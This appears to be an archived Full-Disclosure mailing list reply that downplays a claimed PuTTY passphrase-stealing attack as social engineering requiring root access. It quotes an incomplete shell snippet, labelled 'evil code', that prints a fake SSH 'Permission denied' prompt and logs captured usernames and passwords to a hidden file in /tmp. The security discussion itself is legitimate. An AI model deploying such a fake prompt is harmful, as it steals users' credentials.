mailing list archives
Re: PuTTY private key passphrase stealing attack
From: rapper crazy <rappercrazzy () gmail com>
Date: Wed, 2 Jun 2010 13:29:40 +0530
all controls like MOTD can be bypassed ...
# evil code
mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1`
echo -en "Permission denied, please try again.\n"
echo -en "$mUn () $mIP's password:"
echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log
echo -en "\n"
Apart from this, we already need to have root access to replace any .bashrc
file ... this is not really an attack but a social engineering attack ....
if we had root access we could attach sshd to the strace and get any
password etc all details ....
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/